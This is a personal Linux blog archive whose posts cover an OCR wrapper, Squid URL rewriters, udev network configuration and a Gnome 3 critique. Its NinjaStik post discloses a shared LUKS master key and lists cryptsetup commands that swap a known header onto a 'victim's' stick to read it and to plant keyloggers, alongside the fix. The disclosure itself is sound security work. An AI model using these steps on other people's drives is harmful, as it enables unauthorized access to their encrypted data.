Monday, October 14, 2013

Tesseract wrapper

GOCR really doesn't seem to recognize Finnish or different kinds of fonts out of the box. Tesseract has no problems recognizing the content I feed it, so I wanted to configure XSANE to use Tesseract instead. Setting up XSANE to use Tesseract is not straightforward, though: XSANE expects the input and output files to be passed as options, whereas Tesseract takes the input file as its first argument and the basename of the output as its second. By default XSANE is configured to use GOCR.

The easy way to make XSANE work with Tesseract was to write a wrapper script that accepts options the way XSANE provides them, so that's what I did.


Comparison of options:


Tesseract

[sebastian@localhost tesseract-wrapper]$ tesseract --help
Usage:tesseract imagename outputbase [-l lang] [-psm pagesegmode] [configfile...]

pagesegmode values are:
0 = Orientation and script detection (OSD) only.
1 = Automatic page segmentation with OSD.
2 = Automatic page segmentation, but no OSD, or OCR
3 = Fully automatic page segmentation, but no OSD. (Default)
4 = Assume a single column of text of variable sizes.
5 = Assume a single uniform block of vertically aligned text.
6 = Assume a single uniform block of text.
7 = Treat the image as a single text line.
8 = Treat the image as a single word.
9 = Treat the image as a single word in a circle.
10 = Treat the image as a single character.
-l lang and/or -psm pagesegmode must occur before anyconfigfile.

Single options:
  -v --version: version info
  --list-langs: list available languages for tesseract engine

GOCR

[sebastian@localhost tesseract-wrapper]$ gocr --help
 Optical Character Recognition --- gocr 0.49 20100924
 Copyright (C) 2001-2010 Joerg Schulenburg  GPG=1024D/53BDFBE3
 released under the GNU General Public License
 using: gocr [options] pnm_file_name  # use - for stdin
 options (see gocr manual pages for more details):
 -h, --help
 -i name   - input image file (pnm,pgm,pbm,ppm,pcx,...)
 -o name   - output file  (redirection of stdout)
 -e name   - logging file (redirection of stderr)
 -x name   - progress output to fifo (see manual)
 -p name   - database path including final slash (default is ./db/)
 -f fmt    - output format (ISO8859_1 TeX HTML XML UTF8 ASCII)
 -l num    - threshold grey level 0<160<=255 (0 = autodetect)
 -d num    - dust_size (remove small clusters, -1 = autodetect)
 -s num    - spacewidth/dots (0 = autodetect)
 -v num    - verbose (see manual page)
 -c string - list of chars (debugging, see manual)
 -C string - char filter (ex. hexdigits: 0-9A-Fx, only ASCII)
 -m num    - operation modes (bitpattern, see manual)
 -a num    - value of certainty (in percent, 0..100, default=95)
 -u string - output this string for every unrecognized character
 examples:
 gocr -m 4 text1.pbm                   # do layout analyzis
 gocr -m 130 -p ./database/ text1.pbm  # extend database
 djpeg -pnm -gray text.jpg | gocr -    # use jpeg-file via pipe

 webpage: http://jocr.sourceforge.net/

Tesseract wrapper

[sebastian@localhost tesseract-wrapper]$ ./tesseract-wrapper --help
Syntax:
./tesseract-wrapper -i inputfile [-o outputfile] [-l lang]
Clone the repo on GitHub
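For reference, here is a minimal sketch of what such a wrapper can look like; it is only an illustration of the idea, not the exact script from the repo, and the option handling and temporary file name are my own assumptions.

#!/bin/bash
# Illustrative wrapper sketch: XSANE passes the input and output files as options,
# while Tesseract wants "tesseract <input> <output-basename>" and appends ".txt"
# to the basename on its own.

usage() {
    echo "Syntax:"
    echo "$0 -i inputfile [-o outputfile] [-l lang]"
    exit 1
}

LANGOPT=""
while getopts "i:o:l:" opt; do
    case $opt in
        i) INPUT="$OPTARG" ;;
        o) OUTPUT="$OPTARG" ;;
        l) LANGOPT="-l $OPTARG" ;;
        *) usage ;;
    esac
done

[ -z "$INPUT" ] && usage
# default the output file if -o was not given
[ -z "$OUTPUT" ] && OUTPUT="${INPUT%.*}.txt"

# run Tesseract against a temporary basename and move the resulting .txt
# to the file XSANE asked for
BASE=$(mktemp -u /tmp/ocr.XXXXXX)
tesseract "$INPUT" "$BASE" $LANGOPT || exit 1
mv "$BASE.txt" "$OUTPUT"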

Saturday, October 5, 2013

NinjaStik encryption vulnerability

The Discovery

(Photo – Flickr Creative Commons: R’eyes)
We at Bittiraha.fi like gadgets. We also like to know what we sell to our customers, so some of the guys started checking out a shipment of NinjaStiks.

I was trying to do some other work while discussing the NinjaStik, anonymity, encryption and other stuff with my co-workers. It was one of those days when you just can't get yourself to concentrate.

I'm sceptical of any security tool that doesn't come with exact instructions on how to reproduce it yourself. There are some getting-started instructions and technical specifications on the NinjaStik site, but elsewhere on the site they also mention some secret ingredients. People are corruptible and imperfect, so anything produced by a human should be considered compromised until proven otherwise. I was arguing my point about trusting a third party when the discussion drifted to the process of changing the default password on the LUKS partition. Instructions for doing so came with the NinjaStik.

The Problem

Changing the password for the master key does not change the master key itself. The NinjaStik is the kind of product you would assume is most conveniently produced by writing an existing disk image to a thumb drive, and the images extracted from the NinjaStiks we had at hand confirmed this: we took two different NinjaStiks and found they used the same master key. We can assume the rest of the shipment are clones as well. This means the claim that your data cannot be accessed without supercomputers and a million years to spend is false. In fact it took 30 minutes, including reading man pages, making coffee and browsing Facebook (you can guess which of these was the most time consuming). It was kind of cool to be able to demonstrate the ability to read the contents of my co-worker's drive, which according to its producer's marketing was an impossible feat.
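You can see this for yourself by comparing the master key digest reported by luksDump before and after a passphrase change; the digest stays identical. The device path below is just an example.

# the "MK digest" line identifies the master key and does not change with the passphrase
cryptsetup luksDump /dev/sdb2 | grep 'MK digest'
cryptsetup luksChangeKey /dev/sdb2
cryptsetup luksDump /dev/sdb2 | grep 'MK digest'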

How simple it was to defeat the encryption on a NinjaStik raises some questions and answers others. How competent are the people behind the development of the NinjaStik? Should you take it for granted that someone who produced a security product understands all the caveats, or even the basic ones? We're going to re-encrypt the NinjaStiks we sell to our customers and include instructions so they can do it themselves.

It would be irresponsible of us to tell our customers to simply trust that we don't keep copies of the master keys ourselves, so I would rather tell the customer to assume we do and then decide whether they want to re-encrypt their device. Who knows, there might by accident be a copy of the master key somewhere in our swap partition, and we might be forced to hand over that data. Of course, whether the customer needs to worry about the encryption depends a lot on what they choose to do with their NinjaStik, or in life generally. For some who purchase this product it doesn't really matter whether it's encrypted or not.

I didn't explore the NinjaStik beyond this vulnerability, as I haven't had the time.

The Aftermath

We contacted a NinjaStik representative on the 29th of September, and they updated their FAQ pretty soon after we explained the vulnerability to them and provided instructions on how to fix the situation. According to the representative they used to build the NinjaStiks with a room full of PCs, but they recently started cloning. He told us they would contact the customers with affected NinjaStiks and immediately return to building them with the room-full-of-PCs method. He also offered to rebuild the NinjaStiks we had and pay the shipping costs, which was nice of him although unnecessary, as it's not much of an effort for us to do it ourselves. According to the representative there aren't many NinjaStiks out there created with the cloning method. We advised them to build NinjaStiks with another boot option that would boot on first use and re-encrypt the encrypted partition. We then gave them a week to handle the situation on their end before releasing the details of this vulnerability. Still, in their updated FAQ they are downplaying the vulnerability:
"Can I change the encryption passphrase?

Yes you can and it is highly recommended – the NinjaStik ships with a default encryption passphrase and a default login password.  Both of these should be changed the first time you use the NinjaStik.  The NinjaStik also includes instructions to change the volume encryption key to further ensure that even we couldn’t gain access to your NinjaStik."
The wording "to further ensure" sounds to me like something you shouldn't really worry about. In reality the opposite is true. It's not even about just them gaining access to the data on your NinjaStik, everyone can. (The different capacity NinjaStiks might use a different master key, but there are copies of the master keys already out there on already purchased sticks.) Also it's more likely that the one trying to decrypt your device is someone you know or the authorities and thus it's more likely that they have access to the same master key as the one used in your batch.

Then there's the issue of cloning being a recent addition to their production process. I don't see many plausible reasons to use a non-cloning process to manufacture an OS on a thumb drive besides not knowing how to clone disks, or knowing that cloning would make the master key on the NinjaStik shared. I have difficulty understanding how anyone who put this stick together in the first place would not know how to clone it, so I'm inclined to think they knew they were compromising the encryption but maybe didn't realize how serious it was, or didn't care. But hey, I'm a paranoid tinfoil hat person.

The Method

The same master key is used in all NinjaStiks, thus any NinjaStik can be decrypted using the known master key or a backup of the LUKS header (which contains the key). I demonstrate here how to gain access using a copy of a header from a fresh NinjaStik. The way LUKS works, even if you change the password for a keyslot, the actual key used for encryption stays the same. Therefore it is trivial to use a known master key (or a vanilla header) to decrypt a LUKS device.

Ingredients: two NinjaStiks. The victim's NinjaStik, which has an unknown password set, and one with a known password.

# Extract the LUKS header from the new NinjaStik. The password is "password"
cryptsetup luksHeaderBackup --header-backup-file=vanilla-header.bak /dev/sda2

# Remove the NinjaStik and plug in the victim's NinjaStik
# Optional step: extract the LUKS header from the second NinjaStik
cryptsetup luksHeaderBackup --header-backup-file=victim-header.bak /dev/sda2

# Replace the header on the victim's NinjaStik
cryptsetup luksHeaderRestore --header-backup-file=vanilla-header.bak /dev/sdb2

# Open the LUKS partition using the default password "password"
cryptsetup luksOpen /dev/sdb2 stick

# Mount the partition
mkdir /mnt/decrypted
mount /dev/mapper/stick /mnt/decrypted

# Achievement unlocked: you can now read and write on the victim's NinjaStik and
# compromise any security measure on the operating system residing on the stick
# (install keyloggers or whatever)

# Unmount the stick and close the LUKS partition
umount /mnt/decrypted
cryptsetup luksClose stick

# Restore the original header to the stick
cryptsetup luksHeaderRestore --header-backup-file=victim-header.bak /dev/sdb2

# The victim's NinjaStik can now again be opened with the password set by the victim.

One alternative approach is to just clone the victim's NinjaStik without making any changes to the stick at all. The contents can then be decrypted using the image and a header with the known password.
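Roughly like this, assuming the encrypted partition has already been copied off the stick and that vanilla-header.bak is the known-password header extracted in the first step; the file names are just examples.

# copy the encrypted partition without modifying the victim's stick
dd if=/dev/sdb2 of=victim-part2.img bs=4M

# open the copy through the detached known-password header; recent cryptsetup
# versions attach a loop device for the image automatically, otherwise use losetup first
cryptsetup luksOpen --header vanilla-header.bak victim-part2.img stick-copy
mkdir -p /mnt/decrypted-copy
mount -o ro /dev/mapper/stick-copy /mnt/decrypted-copy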

The Quick Fix

In order to prevent unauthorized access to a NinjaStik, the very first thing a user should do is re-encrypt the LUKS partition. This can be done after booting the computer with a Linux LiveCD; I recommend Fedora Live Desktop. The cryptsetup-reencrypt tool is not preinstalled on the LiveCD, but you can install it from the command line with
sudo yum -y install cryptsetup-reencrypt
A quick look led me to the conclusion that the cryptsetup-reencrypt tool is not available on Ubuntu 12.04.3 at the moment. After you have booted up the LiveCD, open a terminal, gain root privileges, plug in the NinjaStik and follow these instructions:


# identify the last plugged-in device

dmesg|tail
[ 1494.609774] sd 6:0:0:0: [sdf] Write Protect is off
[ 1494.609781] sd 6:0:0:0: [sdf] Mode Sense: 23 00 00 00
[ 1494.610406] sd 6:0:0:0: [sdf] No Caching mode page present
[ 1494.610409] sd 6:0:0:0: [sdf] Assuming drive cache: write through
[ 1494.613495] sd 6:0:0:0: [sdf] No Caching mode page present
[ 1494.613500] sd 6:0:0:0: [sdf] Assuming drive cache: write through
[ 1494.614011]  sdf: sdf1
[ 1494.616820] sd 6:0:0:0: [sdf] No Caching mode page present
[ 1494.616824] sd 6:0:0:0: [sdf] Assuming drive cache: write through
[ 1494.616827] sd 6:0:0:0: [sdf] Attached SCSI removable disk

# you see here we plugged in the device /dev/sdf
# on the NinjaStik the second partition is the encrypted one
# thus the partition we want to re-encrypt would be /dev/sdf2

# re-encrypt the partition, it will take some time
cryptsetup-reencrypt -B 32 -c aes-xts-plain64 /dev/yourdevice

Alternatively, you can and probably should do these operations on a copy of your NinjaStik image instead, and after you have confirmed the result works, write the image back to your NinjaStik.
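Something along these lines should do it, assuming the stick shows up as /dev/sdf like in the dmesg output above; the device and file names are examples only.

# image the whole stick
dd if=/dev/sdf of=ninjastik.img bs=4M

# attach the image to a loop device; -P exposes the partitions as /dev/loop0p1, /dev/loop0p2
losetup -P /dev/loop0 ninjastik.img

# re-encrypt the encrypted partition inside the image
cryptsetup-reencrypt -B 32 -c aes-xts-plain64 /dev/loop0p2

# detach the image and, once you have verified it opens and boots, write it back
losetup -d /dev/loop0
dd if=ninjastik.img of=/dev/sdf bs=4M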

See more info on re-encryption here: http://asalor.blogspot.fi/2012/08/re-encryption-of-luks-device-cryptsetup.html

You should check your master key details with cryptsetup luksDump. The default header we had in our sticks looked like this:

Version:        1
Cipher name:    aes
Cipher mode:    cbc-essiv:sha256
Hash spec:      sha1
Payload offset: 4096
MK bits:        256
MK digest:      bb 49 14 91 26 e1 be 4e 45 2c 9e 81 15 95 45 43 14 1d 9c eb 
MK salt:        09 b3 d0 c4 15 8e cb 0b 4c 20 02 39 a3 71 7c 67 
                61 5c 3a ef 8b 3f f9 87 fb d5 bc 03 b9 eb ca 21 
MK iterations:  18750
UUID:           4f85fbe5-2d73-47e4-a59f-3ae3b080d913

In all cases you should re-encrypt, even if the master key differs from this one. If you find that your master key matches, leave a comment.

The Solution

NinjaStiks should contain a second boot option that boots the stick into a mode where the encrypted partition is not mounted. After booting is complete, the stick should run a script that asks the user for the current password and a new password twice, then re-encrypts the encrypted partition and reboots. At the moment this also requires updating cryptsetup to 1.5, as the version currently available on Ubuntu 12.04.3 (1.4.1) does not contain the re-encryption tool.
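A minimal sketch of what such a first-boot script could look like; the partition path, the prompts and the use of cryptsetup-reencrypt are my assumptions, and this is not something the NinjaStik currently ships.

#!/bin/bash
# hypothetical first-boot re-encryption script (requires cryptsetup 1.5+)
PART=/dev/sda2

echo "Re-encrypting $PART with a freshly generated master key, this will take a while..."
# cryptsetup-reencrypt prompts for the current passphrase itself
cryptsetup-reencrypt -B 32 -c aes-xts-plain64 "$PART" || exit 1

echo "Now choose your own passphrase."
# prompts for the current passphrase and asks for the new one twice
cryptsetup luksChangeKey "$PART" || exit 1

reboot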

A Conclusion

The worst threat to security is false security.

Originally posted on my blog Semantics

UPDATE:
If you want to check whether you have a NinjaStik that was manufactured with a cloning process, paste the sha256 digest of your master key digest in the comments below.

IMPORTANT:
The only thing that can be proven is that if you find two drives with the same master key digest, the corresponding master key is thoroughly compromised. If the digests are different, that does not prove anything. There is no guarantee that someone does not know the master key of your NinjaStik the moment you receive it, so if you have to be absolutely sure nobody else can open your NinjaStik, you have to re-encrypt it yourself. You should also request that the NinjaStik manufacturer provide a first-start feature where the stick is re-encrypted with a random master key before use.

If you don't understand what this command does, you probably shouldn't be pasting it into your console (that goes for every tutorial on the interwebs). You should actually never paste stuff directly into your terminal.

# print out the sha256 digest of your master key digest like this
cryptsetup luksDump /dev/yourdevice|grep 'MK digest'|sed -e 's/^MK digest:[[:space:]]*//'|sha256sum
# you should have a hash that is reasonably well anonymized. Paste it in the comments for others to see and compare.

Saturday, June 1, 2013

Why Gnome 3 sucks for a desktop power user

When Gnome 3 replaced my familiar Gnome 2 user experience, I was not very pleased. The point of this post is that instead of just complaining about Gnome 3, I would like to help make it better.

What I noticed first

My productivity suffered. I was spending more time waiting and searching for apps, information and action buttons. I'm used to being able to glance at my screen and absorb a lot of information about the state of my files, apps and whatever. Trying to do this on Gnome 3, I would just waste time and get easily distracted. Why can't I even see modification times for files modified on any day other than today? Why isn't there even an option in the settings for this? Why can't I change the SELinux security context of my files? I really wanted to know why the user experience sucked for me, so I tried to figure out the difference between Gnome 2 and 3. My conclusion was that Gnome 3 is a window manager for touch-based devices, but tries and fails to be a window manager for the desktop as well.

Desktop UI

  • Viewing distance: short
  • Pointing device: mouse
  • Text input: physical keyboard
  • Usage: a wide selection of applications that are used with both keyboard and mouse at the same time. Ratio of interactions/time is high.
  • Hardware: Fast processor and lots of memory, high resolution
Because the number of interactions is high, even the slightest delays add up to a lot of time spent waiting.
A desktop UI has evolved to perform most actions with minimal effort (minimize mouse travel, use keyboard shortcuts to avoid menus).

In a traditional application menu you can find pretty much all the desktop applications available to you, and you can very quickly get a picture of what's available in each category. It is very suitable for a desktop operating system with lots of applications. On a touch-based device this kind of menu would be difficult to use, as the items are too small for an inaccurate pointing device. A traditional application menu is designed to be used with a mouse.

Touch or gesture based UI

  • Viewing distance: short or long
  • Pointing device: touch or gesture based
  • Text input: mostly on screen keyboard controlled by pointing device but also speech recognition
  • Types of devices: Smartphone, tablet and television/multimedia center
  • Usage: mostly limited to few applications and does not require custom commands in order to serve its purpose. Ratio of interactions/time is low.
  • Hardware: Cheaper processors and less memory, resolution varies
The number of interactions is relatively low. Delays in areas you don't frequently use (settings, tuning etc.) are not that important as long as basic usage is fast (answering calls, changing channels etc.).
Basic usage happens with an inaccurate pointing device and a limited screen size (content is spread across multiple screens with on-screen navigational cues).

You can clearly see that Gnome 3 is designed to be easy to use by touch. Any touch device must deal with the inaccuracy of fingers as a pointing device, which reduces the maximum number of items you can interact with at any time. Although you can use a mouse to do gestures similar to those done with fingers, it requires moving the mouse more than in a desktop user interface. Using the application menu to find an application becomes time consuming with a mouse, especially when you have a lot of applications installed. You can expect a touch-based device to contain fewer applications to look through, so the number of applications should not be a problem on a touch device.

When Gnome 3 is used on a desktop, you naturally have a keyboard available as well. You can quite quickly press the Super key and type the first letters of the application you wish to launch, provided you don't blank out on the name of the app. For me that happens quite often. On the plus side, plugins look pretty and are quite easy to install, and you can get a traditional application menu with a plugin.

A desktop window manager is fundamentally different from a touch-based window manager. A desktop user interface specializes in managing applications with a high on-screen item density and a high-resolution pointing device. Using a desktop-oriented UI is difficult with an inaccurate pointing device such as a finger. Even if you had very accurate fingers, you cannot see through them, so you can only estimate the exact coordinates of the pointer within some margin of error. A finger also produces more random movement even when you try to keep it perfectly still, and even more so when you are touching down on or releasing from the surface of the screen. Besides touch devices, a low on-screen item density also suits a computer in the living room. It would make sense to control such a device with hand gestures or a motion-tracked remote (Kinect, or a webcam plus some OpenCV magic).

It is my belief that by trying to satisfy both desktop and touch device users with the same UI, you end up with a good UI for neither. You should accept that there are fundamental differences and that the user interfaces should be different. Maybe the window manager should adapt the UI depending on the input devices available? Touch-based user interfaces are still relatively new and there may yet be innovations in that field. I hope someone comes up with ways to make such interfaces easier and faster to use on a desktop computer as well.

Thursday, April 11, 2013

Configuring a 4-port Sun Happy Meal card

Some time ago I rescued a pair of 4-port Oracle/SUN Happy Meal 10/100 Ethernet cards and decided it was time to play with them. There was an issue with the sunhme driver, so I created an akmod package for Fedora 18 to patch the bug on my system, so that the patch is also picked up automatically on every kernel update. The akmod package is available on GitHub.

There's another quirk to these cards as well. At least on my system there is an issue with interface renaming that leads to one of the interfaces being renamed inconsistently (the interface name ends up being something like "rename6"). I wanted to rename the interfaces nicely so that I could tell the sunhme interfaces apart from the other interfaces in my system.

In addition to the weird renames, these cards share a single MAC address across all their interfaces, so you can't match the interfaces by MAC address either.

These quirks made getting the udev rules to match rather challenging. Eventually I found a nice script that scans for the interfaces and creates a template for a proper matching udev rule.
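If you want to look at the attributes yourself, something like this should dump the values the rules below match on; the PCI bus prefix 0000:06 in my rules is specific to this machine.

# walk the udev attribute chain of every network interface and pick out
# the attributes the rules match on (parent device path, dev_id and type)
for iface in /sys/class/net/*; do
    echo "== $iface"
    udevadm info -a -p "$iface" | grep -E 'KERNELS==|ATTR\{dev_id\}|ATTR\{type\}'
done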

To be able to use just one interface without packets disappearing on the other interfaces, which might not be physically connected, I also set unique MAC addresses for all the interfaces.

/etc/udev/rules.d/30-sun-hme.rules

SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{dev_id}=="0x0", ATTR{type}=="1", KERNELS=="0000:06:00.1", \
    KERNEL=="eth*", NAME="hme0", RUN+="/usr/local/bin/sunmacchanger %k 00:03:ba:a8:58:e5"
SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{dev_id}=="0x0", ATTR{type}=="1", KERNELS=="0000:06:01.1", \
    KERNEL=="eth*", NAME="hme1", RUN+="/usr/local/bin/sunmacchanger %k 00:03:ba:a8:58:e6"
SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{dev_id}=="0x0", ATTR{type}=="1", KERNELS=="0000:06:02.1", \
    KERNEL=="eth*", NAME="hme2", RUN+="/usr/local/bin/sunmacchanger %k 00:03:ba:a8:58:e7"
SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{dev_id}=="0x0", ATTR{type}=="1", KERNELS=="0000:06:03.1", \
    KERNEL=="eth*", NAME="hme3", RUN+="/usr/local/bin/sunmacchanger %k 00:03:ba:a6:58:e8"

/usr/local/bin/sunmacchanger

#!/bin/bash
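# called from the udev rules above with: $1 = kernel interface name (udev's %k),
# $2 = the MAC address to assign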

#make sure the interface is down, otherwise setting the mac will fail
/sbin/ifconfig $1 down
/usr/bin/macchanger --mac=$2 $1

After the changes I just needed to unload the driver, reload the rules and load the driver again, and the udev magic would happen:
chmod +x /usr/local/bin/sunmacchanger
rmmod sunhme
udevadm control --reload-rules
#loading my patched version of sunhme driver
modprobe sunhme2g

Now I have four 100M interfaces on one card. They'll come in handy for routing traffic outside my LAN, and I could have redundancy in case one WAN connection goes down.

Unless I specifically tell NetworkManager not to bring up interfaces hme1-hme3, it will bring them up anyway. This causes some log spam:

output of dmesg

[ 6438.361078] hme1: Auto-Negotiation unsuccessful, trying force link mode
[ 6438.369059] hme2: Auto-Negotiation unsuccessful, trying force link mode
[ 6438.373052] hme3: Auto-Negotiation unsuccessful, trying force link mode
[ 6447.974274] hme1: Link down, cable problem?
[ 6447.982269] hme2: Link down, cable problem?
[ 6447.986242] hme3: Link down, cable problem?
[ 6459.990561] hme1: Auto-Negotiation unsuccessful, trying force link mode
[ 6459.998551] hme2: Auto-Negotiation unsuccessful, trying force link mode
[ 6460.002549] hme3: Auto-Negotiation unsuccessful, trying force link mode
[ 6469.603795] hme1: Link down, cable problem?
[ 6469.611764] hme2: Link down, cable problem?
[ 6469.615756] hme3: Link down, cable problem?

You can prevent NetworkManager from needlessly bringing up these interfaces by adding their MACs to the unmanaged-devices parameter in the [keyfile] section and checking that the keyfile plugin is listed in the plugins parameter of the [main] section.

/etc/NetworkManager/NetworkManager.conf

[main]
plugins=ifcfg-rh,keyfile

[keyfile]
unmanaged-devices=mac:00:03:ba:a8:58:e6;mac:00:03:ba:a8:58:e7;mac:00:03:ba:a8:58:e8

It's not exactly plug and play, but playing with these cards is a good learning opportunity. It wouldn't hurt to have some kind of graphical configuration tool for this stuff; doing it "manually" requires some knowledge of udev and NetworkManager, plus a search engine.

Sunday, April 7, 2013

Google Redirect Rewrite memory usage

Image courtesy of Open Clip Art Library
I previously found out that you can pretty easily rewrite URLs for Squid. Today I noticed Squid launches a bunch of child processes to do the URL rewriting, and I got curious about the memory usage. I had a feeling that the Perl version would not consume as much memory as the PHP one, and it appears that is indeed the case.

I tested both the PHP and Perl versions to see how much memory they would consume. First I checked the memory usage of the PHP version after browsing a bit. Then I changed squid.conf to use the Perl version and checked the memory usage again. Squid had launched just one googlerewriter child process, so I browsed some more and then checked again. I'm guessing Squid starts the processes when it actually needs them (P.S. the documentation confirms this). Anyway, more processes then appeared to have been launched.
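The number of helpers is also tunable in squid.conf; if I remember the directive correctly, url_rewrite_children caps how many rewriter processes Squid may launch, so something like the line below would do (the value is just an example):

# allow up to 10 URL rewrite helpers; newer Squid versions also accept
# startup= and idle= options on this line
url_rewrite_children 10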

Fields

MAJFL
Major page fault: The number of major page faults that have occurred with this process
TRS (kB)
Text resident set: The amount of physical memory devoted to executable code
DRS (kB)
Data resident set: The amount of physical memory devoted to other than executable code
RSS (kB)
Resident set size: The portion of a process's memory that is held in RAM. The rest of the memory exists in swap or the filesystem (never loaded or previously unloaded parts of the executable).

Even for a tiny script, the PHP version caused some page faults, and it uses way too much memory for the task it's doing.

PHP

$ ps faxv
  PID TTY      STAT   TIME  MAJFL   TRS   DRS   RSS %MEM COMMAND
13098 ?        Ss     0:00      0  5047 12668  2608  0.0 /usr/sbin/squid -a 3128 -f /etc/squid/squid.conf
13100 ?        S      0:01      5  5047 35240 25052  0.4  \_ (squid-1) -a 3128 -f /etc/squid/squid.conf
13101 ?        S      0:00      0     5  3942   992  0.0      \_ (logfile-daemon) /var/log/squid/access.log
13102 ?        S      0:00      1     2  3793   740  0.0      \_ (unlinkd)
13109 ?        S      0:00     50  3385 43962  7812  0.1      \_ /usr/bin/php /usr/local/bin/googlerewriter.php
13111 ?        S      0:00      0  3385 43962  7816  0.1      \_ /usr/bin/php /usr/local/bin/googlerewriter.php
13115 ?        S      0:00      0  3385 43962  7816  0.1      \_ /usr/bin/php /usr/local/bin/googlerewriter.php
13116 ?        S      0:00      0  3385 43962  7812  0.1      \_ /usr/bin/php /usr/local/bin/googlerewriter.php
13117 ?        S      0:00      0  3385 43962  7816  0.1      \_ /usr/bin/php /usr/local/bin/googlerewriter.php

$ top
  PID USER      PR  NI  VIRT  RES  SHR S  %CPU %MEM    TIME+  COMMAND
15552 squid     20   0 47348 7812 5428 S   0.0  0.1   0:00.05 googlerewriter.
15735 squid     20   0 47348 7816 5428 S   0.0  0.1   0:00.03 googlerewriter.
15736 squid     20   0 47348 7816 5428 S   0.0  0.1   0:00.03 googlerewriter.
15741 squid     20   0 47348 7816 5428 S   0.0  0.1   0:00.03 googlerewriter.
The resident set size of the Perl version is about 31% of the PHP version's, or in other words the PHP version uses roughly three times as much memory per process. By using the Perl version you'd save at least 5.2 MiB. Not that this matters much on my current proxy server, but on an embedded server it would.
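The arithmetic comes straight from the RSS columns in the two listings:

# Perl helper RSS ~2460 kB vs PHP helper RSS ~7816 kB
echo $((2460 * 100 / 7816))        # prints 31, i.e. about 31 %
echo $(( (7816 - 2460) / 1024 ))   # prints 5, i.e. roughly 5.2 MiB saved per helper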

Perl

$ ps faxv
  PID TTY      STAT   TIME  MAJFL   TRS   DRS   RSS %MEM COMMAND
13382 ?        Ss     0:00      0  5047 12668  2608  0.0 /usr/sbin/squid -a 3128 -f /etc/squid/squid.conf
13384 ?        S      0:01      0  5047 37988 25308  0.4  \_ (squid-1) -a 3128 -f /etc/squid/squid.conf
13387 ?        S      0:00      0     5  3942   992  0.0      \_ (logfile-daemon) /var/log/squid/access.log
13388 ?        S      0:00      0     2  3793   740  0.0      \_ (unlinkd)
13396 ?        S      0:00      0     3  8700  2460  0.0      \_ /usr/bin/perl /usr/local/bin/googlerewriter.pl
13426 ?        S      0:00      0     3  8700  2376  0.0      \_ /usr/bin/perl /usr/local/bin/googlerewriter.pl
13427 ?        S      0:00      0     3  8700  2372  0.0      \_ /usr/bin/perl /usr/local/bin/googlerewriter.pl
13429 ?        S      0:00      0     3  8700  2460  0.0      \_ /usr/bin/perl /usr/local/bin/googlerewriter.pl
13430 ?        S      0:00      0     3  8700  2460  0.0      \_ /usr/bin/perl /usr/local/bin/googlerewriter.pl
13431 ?        S      0:00      0     3  8700  2460  0.0      \_ /usr/bin/perl /usr/local/bin/googlerewriter.pl

$ top
  PID USER      PR  NI  VIRT  RES  SHR S  %CPU %MEM    TIME+  COMMAND
13396 squid     20   0  8704 2460 1724 S   0.0  0.0   0:00.19 googlerewriter.
13429 squid     20   0  8704 2460 1724 S   0.0  0.0   0:00.03 googlerewriter.
13430 squid     20   0  8704 2460 1724 S   0.0  0.0   0:00.02 googlerewriter.
13431 squid     20   0  8704 2460 1724 S   0.0  0.0   0:00.02 googlerewriter.
13426 squid     20   0  8704 2376 1716 S   0.0  0.0   0:00.04 googlerewriter.
13427 squid     20   0  8704 2372 1716 S   0.0  0.0   0:00.03 googlerewriter.

Saturday, April 6, 2013

Faster browsing aka Google Redirect Rewrite

Image courtesy of Open Clip Art Library
Once again I got annoyed by having to wait for Google to redirect me. I also think it's none of Google's business to know which sites I visit, especially if they can't be quick about it. So I decided to get rid of the delay.
I checked whether there's a plugin for that, and it seems there is: you can install Remove Google Redirects from the Chrome Web Store. Being the paranoid weirdo that I am, that still wasn't enough. I already had a Squid proxy configured so that you couldn't even tell that some websites were blocked by my ISP (Sonera). It made sense to figure out whether there was a trick I could do with Squid that would get rid of the middle man (Google) in the redirect process.

And behold, the creators of Squid have indeed been wise enough to add a way to mangle URLs. All I had to do was write a script that takes the URL, checks whether it's a Google redirect URL and, if so, parses it to get the actual URL we want to go to and returns that. The example on the Squid feature page was a good place to start, and this is what I came up with:

Perl Version


#!/usr/bin/perl

use URI;
use URI::QueryParam;

$|=1;
while (<>) {
    chomp;
    @X = split;
    $url = $X[1];
    #check if this is a google redirect url
    if ($url =~ /\/\/.*\.google\.[^\/]+\/url/) {
        my $uri = URI->new($url);
        $url = $uri->query_param("url");
        print $X[0]." 302:$url\n";
    } else {
        print $X[0]." \n";
    }
}
I had to install a couple of Perl modules while refamiliarizing myself with Perl, so I wanted to make a PHP version of the same helper. With PHP I wouldn't have to install any extra modules when I someday decide to use this on some other machine; I usually have PHP installed everywhere.

PHP Version


#!/usr/bin/php
<?php

function convertUrlQuery($query) {
    $queryParts = explode('&', $query);

    $params = array();
    foreach ($queryParts as $param) {
        $item = explode('=', $param);
        $params[$item[0]] = $item[1];
    }

    return $params;
}
while(1){
    $line = trim(fgets(STDIN)); // reads one line from STDIN
    $params = explode(" ", $line);
    $pattern = '/\/\/.*\.google\.[^\/]+\/url/';

    if (preg_match($pattern, $params[1], $matches, PREG_OFFSET_CAPTURE, 3)) {
        $parts = parse_url($params[1]);
        $query = convertUrlQuery($parts['query']);
        $url = urldecode($query['url']);
        echo $params[0]." 302:$url\n";
    } else {
        echo $params[0]." \n";
    }
}


In the end I like that with Perl I didn't have to write any functions for simple things like URL parsing, but unless I package this as an installable package, I couldn't just drop it in and expect it to work, since I had to install the extra stuff as modules. (Yes, I could have written my own implementation, but I'm not that much into reinventing the wheel. Also, I was a bit impatient to get the script ready so I could see the results.) With the PHP version I could just drop it in, and as long as PHP was installed it would work.

I strongly recommend adding this line to squid.conf. It really makes a difference:

url_rewrite_program /path/to/googleredirectrewriter
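You can also test the helper by hand before pointing Squid at it. Here is roughly how, assuming you saved the Perl version as /usr/local/bin/googlerewriter.pl; the leading "0" mimics the channel ID the script expects at the start of each line, and the URL is made up.

echo '0 http://www.google.com/url?url=http%3A%2F%2Fexample.com%2F' | /usr/local/bin/googlerewriter.pl
# should print something like: 0 302:http://example.com/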

Tuesday, April 2, 2013

Setting up Prestashop file permissions on Fedora

Sometimes I need to write important things down somewhere I can find them. That's the case again with setting up Prestashop file permissions on an SELinux-enabled system such as Fedora.


cd prestashop
chown -R apache:sebastian .
# allow user and group to search directories and make new files inherit the group of the parent folder
find . -type d -exec chmod ug+xs {} \;
